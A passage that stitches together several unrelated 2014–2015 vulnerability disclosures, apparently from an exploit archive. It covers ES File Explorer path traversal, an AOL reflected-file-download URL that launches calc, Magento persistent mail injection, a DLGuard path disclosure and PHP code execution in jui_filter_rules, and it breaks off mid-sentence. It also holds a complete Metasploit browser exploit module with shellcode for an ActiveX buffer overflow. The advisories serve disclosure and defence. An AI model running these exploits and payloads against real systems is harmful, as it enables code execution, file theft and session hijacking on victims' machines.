Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Path Traveral web vulnerability has been discovered in the official in the official ES File Explorer v3.2.4.1 mobile android web-application. The security vulnerability allows a remote attacker to unauthorized request local files and device system paths to compromise the application or device. The vulnerability is located in the `content://com.estrongs.files/system/` path request with the <file> context. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the sdcard path request in the com.estrongs.files/system with a malicious path request like ./etc/passwd ./etc/hosts and continues the request. The attack vector is located on the application-side of the service and the request is http. The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise Request Method(s): [+] POST & Sync Vulnerable Module(s): [+] content://com.estrongs.files/ Vulnerable Parameter(s): [+] path Affected Module(s): [+] content://com.estrongs.files/system/ Proof of Concept (PoC): ======================= The arbitrary code execution vulnerability can be exploited by remote attackers without user interaction or privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- Package: com.estrongs.android.pop Application Label: ES File Explorer Process Name: com.estrongs.android.pop Version: 3.2.4.1 Data Directory: /data/data/com.estrongs.android.pop APK Path: /data/app/com.estrongs.android.pop-2.apk UID: 10235 GID: [3003, 3002, 3001, 1015, 1028] Permissions: - android.permission.WRITE_SETTINGS - android.permission.CHANGE_WIFI_STATE - android.permission.CHANGE_NETWORK_STATE - android.permission.INTERNET - android.permission.SET_WALLPAPER - android.permission.ACCESS_NETWORK_STATE - android.permission.ACCESS_WIFI_STATE - com.android.launcher.permission.INSTALL_SHORTCUT - com.android.launcher.permission.UNINSTALL_SHORTCUT - android.permission.BLUETOOTH - android.permission.BLUETOOTH_ADMIN - android.permission.WRITE_EXTERNAL_STORAGE - android.permission.WRITE_MEDIA_STORAGE - android.permission.WAKE_LOCK - android.permission.READ_PHONE_STATE - android.permission.ACCESS_SUPERUSER - android.permission.VIBRATE - .PERMISSION - android.permission.CHANGE_WIFI_MULTICAST_STATE - android.permission.SYSTEM_ALERT_WINDOW - android.permission.GET_TASKS - android.permission.READ_EXTERNAL_STORAGE Defines Permissions: - None Activities: com.estrongs.android.pop.view.FileExplorerActivity com.estrongs.android.pop.app.compress.CompressionActivity com.estrongs.android.pop.app.compress.CompressionProxyActivity com.estrongs.android.pop.app.ESFileSharingActivity com.estrongs.android.pop.app.SaveToESActivity com.estrongs.android.pop.app.LocalFileSharingActivity com.estrongs.android.pop.app.PopVideoPlayer com.estrongs.android.pop.app.PopVideoPlayerProxyActivity com.estrongs.android.pop.app.AudioPlayerProxyActivity com.estrongs.android.pop.app.editor.PopNoteEditor com.estrongs.android.pop.app.FileChooserActivity com.estrongs.android.pop.app.ESContentChooserActivity com.estrongs.android.pop.app.ESRingtoneChooserActivity com.estrongs.android.pop.app.ESWallPaperChooserActivity com.estrongs.android.pop.app.DownloaderActivity com.estrongs.android.pop.app.BrowserDownloaderActivity com.estrongs.android.pop.app.PopRemoteImageBrowser com.estrongs.android.pop.ftp.ESFtpShortcut com.estrongs.android.pop.app.ShowDialogActivity com.estrongs.android.pop.app.AppCheckUpdateList com.estrongs.android.pop.app.DefaultWindowSetting com.estrongs.android.pop.app.DocumentExtModifyList com.estrongs.android.pop.app.TransitActivity Broadcast(Receiver): com.estrongs.android.pop.app.AudioPlayerService$MediaButtonReceiver com.baidu.share.message.ShareReceiver com.estrongs.android.pop.EnableOEMConfig com.estrongs.android.pop.app.InstallMonitorReceiver com.estrongs.android.pop.app.StartServiceReceiver Services: com.estrongs.android.pop.bt.OBEXFtpServerService Permission: null Providers: Authority: com.estrongs.files Read Permission: null Write Permission: null Content Provider: com.estrongs.android.pop.app.FileContentProvider Multiprocess Allowed: False Grant Uri Permissions: True read content://com.estrongs.files/system/../../../../../sdcard/<file> Read file hosts read content://com.estrongs.files/system/etc/hosts 127.0.0.1 localhost Solution - Fix & Patch: ======================= In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. Vulnerable code: com.estrongs.files Read Permission: null Write Permission: null android:exported="true" change "true" to "false" When the value is "false", only components of the same application or applications with the same user ID can start the service or bind to it. <provider android:authorities="com.estrongs.files" android:exported="true" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> Fixed code: <provider android:authorities="com.estrongs.files" android:exported="false" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> read content://com.estrongs.files/system/etc/hosts Permission Denial: opening provider com.estrongs.android.pop.app.FileContentProv ider from ProcessRecord{4192d1a0 32050:com.mwr.dz:remote/u0a216} (pid=32050, uid =10216) that is not exported from uid 10235 Security Risk: ============== The security risk of the path traversal web vulnerability in the android app is estimated as high. (CVSS 7.8) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ Source

Oren Hafif reported a new kind of attack called Reflected File Download (https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-new-web-attack-vector) in Black Hat Europe 2014 conference. More details about the attack you can found in his public presentation: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf. Google and Bing have already fixed the vulnerability but I've found the same vulnerability in AOL Search Website. A malicious user could send the link below to a victim that you download a malicious batch file from autocomplete.search.aol.com domain. In the link below we have search for 'iramar "||calc||' using the AOL autocomplete domain. The browser will encode the double quotes but the server will escape it (\") and return inside the json on the body response. Since the response has the header "Content-Type: application/x-suggestions+json;charset=UTF-8" the browser will automatically try to download the reflected file. Chrome didn't try to download the file but Internet Explorer and Firefox will. http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar"||calc||&it=ws-landing&dict=en_us_search&count=8&output=json REQUEST GET http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22||calc||&it=ws-landing&dict=en_us_search&count=8&output=json HTTP/1.1 Host: autocomplete.search.aol.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... Connection: keep-alive RESPONSE HTTP/1.1 200 OK Date: Tue, 21 Oct 2014 10:30:34 GMT Server: Apache-Coyote/1.1 Content-Type: application/x-suggestions+json;charset=UTF-8 Content-Language: en-US Content-Length: 24 Keep-Alive: timeout=5, max=10 Connection: Keep-Alive ["iramar\"||calc||", []] Source

Document Title: =============== Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1226 eBay Inc. Bug Bounty Program ID: EIBBP-27288 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/02/14/ebay-inc-magento-2015q1-official-bug-bounty-program-rewards-security-researcher Release Date: ============= 2015-02-14 Vulnerability Laboratory ID (VL-ID): ==================================== 1226 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an application-side input validation and mail encoding web vulnerability in the official eBay Magento and Magento info web-application. Vulnerability Disclosure Timeline: ================================== 2014-03-14: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-15: Vendor Notification (eBay Inc Security Team - Bug Bounty Program) 2014-03-10: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program) 2015-02-12: Vendor Fix/Patch (Magento Developer Team) 2015-02-13: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program) 2015-02-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Magento - Web Application Service 2014 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side mail encoding web vulnerability has been discovered in the official eBay Magento & Info Web-Application. The vulnerability allows remote attackers to bypass the outgoing mail filter validation of the magento web-server & web-application. The vulnerability is located in the first- and lastname values of the `Talk to a Specialist` module. Remote attackers without privileged application user account are able to inject persistent malicious script codes. The script code execution occurs in the notification mail to the specialist but also to the active user copy mail. The persistent injected script code executes in the header section were the database context of the first- and lastname will be displayed. The sender interacts automatically by usage of the magento.com & info.magento.com service. The validation of the db stored outgoing values is wrong encoded and allows persistent injections of malicious script codes via POST method. The attack vector is persistent and the injection request method is POST. The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of web header or mail body context. Vulnerable Domain(s): [+] magento.com & info.magento.com Vulnerable Module(s): [+] Talk to a Specialist Vulnerable Parameter(s): [+] firstname [+] lastname [+] companyname Affected Sender(s): [+] info@magento.com Affected Receiver(s): [+] bkm@evolution-sec.com Affected Context Module(s): [+] Section 1 > mktEditable Proof of Concept (PoC): ======================= The application-side input validation web vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction. For security demonstration or to reproduce the mail encoding web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce of the vulnerability ... 1. You do not need to register an account 2. Open up the main website and switch to the magento.com contacts site 3. On the bottom you need to click the `talk to specialist` button 4. You get redirect to a regular valid formular with a mod specialist notification 5. Inject your script code payloads as first-, last- and companyname values 6. Click the send request button ... Note: Now, you will be redirected by the service after choosing a specialist ... we used `E.C. Kraus` (#sry 7. Send the same request from the input below to the specialist with a non malicious test payload 8. The persistent code execution occurs in the mail to the manager aka specialist but also to the sender of the notification itself (without user auth!) 9. Successful reproduce of the persistent script code injection web vulnerability via POST method request PoC: Your E.C. Kraus Magento Enterprise Case Study Download <html><head> <title>Your E.C. Kraus Magento Enterprise Case Study Download</title> <link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"> </head> <body> <table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%"> <tbody><tr><td><b>Betreff: </b>Your E.C. Kraus Magento Enterprise Case Study Download</td></tr><tr><td> <b>Von: </b>Magento <info@magento.com></td></tr><tr><td><b>Datum: </b>15.03.2014 20:27</td></tr></tbody></table> <table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></tbody></table><br> <meta http-equiv="Content-Type" content="text/html; "> <title></title> <div id="Section 1" class="mktEditable"><p>Dear a "><[PERSISTENT INJECTED SCRIPT CODE 1!]">%20<[PERSISTENT INJECTED SCRIPT CODE 2!]>,</p> <p>Thank you for requesting the Magento Enterprise Case Study on E.C. Kraus. You can download the Case Study here:</p> <p><a href= "http://email.magento.com/397EXO8770000EP01aGC801" >Download</a></p> <p>Check out our complete list of <a href= "http://email.magento.com/397EXO8770000EQ01aGC801" >Magento Case Studies</a></p> <p>To learn more about Magento Enterprise or to reqeust a personalized quote, please <a href= "http://email.magento.com/397EXO8770000ER01aGC801" >contact out Magento Enterprise team</a>.</p> <p>Thank you,</p> <p>The Magento Team</p></div> <IMG SRC="http://email.magento.com/trk?t=1&mid=Mzk3LUVYTy04Nzc6MDozMzkyOjExMzI1OjA6MzMxNzo3OjE3MzIzNDI4LTE6bnVsbA%3D%3D" WIDTH="1" HEIGHT="1" BORDER="0" ALT="" /> </body> </html> </body> </html> </iframe></p></div></body></html> --- PoC Session Logs [POST] --- 21:15:18.356[654ms][total 2913ms] Status: 200[OK] GET http://magento.com/explore/contact-sales Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[magento.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://magento.com/customers/customer-showcase] Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; has_js=1; ClrSSID=1394911380598-4406; ClrOSSID=1394911380598-4406; ClrSCD=1394911380598; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fcustomers%2Fcustomer-showcase; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentomagento%2Cmagentoglobal%3D%2526pid%253D%25252Fcustomers%25252Fcustomer-showcase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmagento.com%25252Fexplore%25252Fcontact-sales_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=-%2C84%2C84%2C2200; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com] Connection[keep-alive] If-None-Match["1394841413-1"] Response Header: Server[maged] Date[Sat, 15 Mar 2014 20:15:18 GMT] Content-Type[text/html; charset=utf-8] Transfer-Encoding[chunked] Connection[keep-alive] X-Drupal-Cache[HIT] Etag["1394841413-1"] x-content-type-options[nosniff] X-Frame-Options[SameOrigin] Content-Language[en] Link[<http://magento.com/explore/contact-sales>; rel="canonical",<http://magento.com/node/22>; rel="shortlink"] Cache-Control[public, max-age=86400] Last-Modified[Fri, 14 Mar 2014 23:56:53 +0000] Expires[Sun, 19 Nov 1978 05:00:00 GMT] Vary[Cookie, Accept-Encoding] Content-Encoding[gzip] X-Server[web04] - 21:15:34.123[335ms][total 335ms] Status: 302[Found] POST https://info.magento.com/index.php/leadCapture/save Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[135] Mime Type[text/html] Request Header: Host[info.magento.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://info.magento.com/EC-Kraus.html] Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; BIGipServerabjweb-ssl2_http=3892838666.20480.0000; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fec-kraus.html; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentoinfo%2Cmagentoglobal%3D%2526pid%253D%25252Fec-kraus.html%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BformSubmit%252528document.getElementById%252528%252522mktForm_1129%252522%252529%252529%25253Breturnfalse%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT; s_ppv=-%2C100%2C100%2C832; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; BIGipServerabjweb-ssl2_https=3909615882.47873.0000; ClrSSID=1394911532386-9188; ClrOSSID=1394911532386-9188; ClrSCD=1394911532386; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com; optimizelyPendingLogEvents=%5B%5D; ClrCSTO=T] Connection[keep-alive] POST-Daten: FirstName[%3Ciframe+src%3Da%3E] LastName[%3Ciframe+src%3Da%3E] Email[bkm%40evolution-sec.com] _marketo_comments[] lpId[2314] subId[36] munchkinId[397-EXO-877] kw[not+found] cr[not+found] searchstr[not+found] lpurl[https%3A%2F%2Finfo.magento.com%2FEC-Kraus.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D] formid[1129] returnURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html] retURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html] returnLPId[2301] _mkt_disp[return] _mkt_trk[id%3A397-EXO-877%26token%3A_mch-magento.com-1394911532816-55587] _comments_marketo[] _mkto_version[2.4.7] Response Header: Date[Sat, 15 Mar 2014 20:15:34 GMT] Server[Apache] Location[https://info.magento.com/EC-Kraus-confirm.html?aliId=67114725] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[135] Connection[close] Content-Type[text/html] Reference(s): http://magento.com/customers/customer-showcase http://magento.com/explore/contact-sales https://info.magento.com/EC-Kraus-confirm.html?aliId=67114607 https://info.magento.com/EC-Kraus.html https://info.magento.com/index.php/leadCapture/save Resource(s): ../Contact Sales _ Magento-inputstep1.htm ../Contact Sales _ Magento-inputstep2.htm ../EC-Kraus-confirm.html ../EC-Kraus-poc2.html ../Your E.C. Kraus Magento Enterprise Case Study Download.html ../Your E.C. Kraus Magento Enterprise Case Study Download.eml ../poc-session-logs.txt ../poc-url-references.txt Picture(s): (view magazine article) ../1.png ../2.png ../3.png ../4.png ../5.png ../6.png ../7.png Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse or encode of the `talk to a specialist` input context. Encode and parse also the outgoing user values of the talk to a specialist form to prevent persistent injections via POST to outgoing service ebay magento mails. Restrict the input and disallow the usage of special chars. Security Risk: ============== The security risk of the persistent input validation and mail encoding web vulnerability is estimated as medium. (CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rh0', # vulnerability discovery and exploit, all the hard work 'juan vazquez' # msf module ], 'References' => [ ['EDB', '35948'], ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/'] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'PrependEncoder' => stack_adjust }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{4B3476C6-185A-4D19-BB09-718B565FA67B}", :os_name => OperatingSystems::Match::WINDOWS, :ua_name => Msf::HttpClients::IE, :ua_ver => '10.0' }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 30 2015", 'DefaultTarget' => 0)) end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") case request.uri when /exploit.js/ print_status("Sending exploit.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, exploit_template(cli, target_info), headers) when /sprayer.js/ print_status("Sending sprayer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, sprayer_template(cli, target_info), headers) when /informer.js/ print_status("Sending informer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, informer_template(cli, target_info), headers) when /rop_builder.js/ print_status("Sending rop_builder.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, rop_builder_template(cli, target_info), headers) else print_status("Sending main.html...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'} send_exploit_html(cli, main_template(cli, target_info), headers) end end def main_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def exploit_template(cli, target_info) shellcode = Rex::Text.to_hex(get_payload(cli, target_info)) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def sprayer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def informer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def rop_builder_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def strip_comments(input) input.gsub(/\/\/.*$/, '') end end Source

*DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities* Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security Vulnerabilities Product: DLGuard Vendor: DLGuard Vulnerable Versions: v4.5 Tested Version: v4.5 Advisory Publication: Feb 18, 2015 Latest Update: Feb 18, 2015 Vulnerability Type: Information Exposure [CWE-200] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* DLGuard *Product & Version:* DLGuard v4.5 *Vendor URL & Download:* DLGuard can be downloaded from here, http://www.dlguard.com/dlginfo/index.php *Product Introduction:* “DLGuard is a powerful, yet easy to use script that you simply upload to your website and then rest assured that your internet business is not only safe, but also much easier to manage, automating the tasks you just don't have the time for." "DLGuard supports the three types, or methods, of sale on the internet: <1>Single item sales (including bonus products!) <2>Multiple item sales <3>Membership websites" *(2) Vulnerability Details:* DLGuard has a security problem. It can be exploited by Full Path Disclosure attacks. *(2.1)* The first vulnerability occurs at “index.php” page with ""c" parameters of it. *References:* http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing Source

-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 PHP Code Execution in jui_filter_rules Parsing Library ====================================================== Researcher: Timo Schmid <tschmid@ernw.de> Description =========== jui_filter_rules[1] is a jQuery plugin which allows users to generate a ruleset which could be used to filter datasets inside a web application. The plugin also provides a PHP library to turn the user submitted ruleset into SQL where statements for server side filtering. This PHP library contains a feature which allows to convert the submitted filter values with server side functions. These functions can be specified within the ruleset, which leads to an arbitrary PHP code execution. Exploitation Technique ====================== Remote Severity Level ============== Critical CVSS Base Score =============== 6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P) CVE-ID ====== <unassigned> Impact ====== By using the provided rule parsing library to generate SQL statements, an attacker is capable of executing arbitrary PHP code in the context of the web server. This could lead to a full compromise of the web server. The attack vector could be limited by existing validation mechanisms around the library, but this would require a partial manual parsing of the user supplied rules. Status ====== Reported Vulnerable Code Section ======================= server_side/php/jui_filter_rules.php: [...] private function create_filter_value_sql($filter_type, $operator_type, ... [...] if(is_array($filter_value_conversion_server_side)) { $function_name = $filter_value_conversion_server_side['function_name']; $args = $filter_value_conversion_server_side['args']; $arg_len = count($args); for($i = 0; $i < $vlen; $i++) { // create arguments values for this filter value $conversion_args = array(); for($a = 0; $a < $arg_len; $a++) { if(array_key_exists('filter_value', $args[$a])) { array_push($conversion_args, $a_values[$i]); } if(array_key_exists('value', $args[$a])) { array_push($conversion_args, $args[$a]['value']); } } // execute user function and assign return value to filter value try { $a_values[$i] = call_user_func_array($function_name, $conversion_args); } catch(Exception $e) { $this->last_error = array( 'element_rule_id' => $element_rule_id, 'error_message' => $e->getMessage() ); break; } } } [...] The provided PHP parsing library allows to specify a PHP function to convert the supplied filter value on the server side. This leads 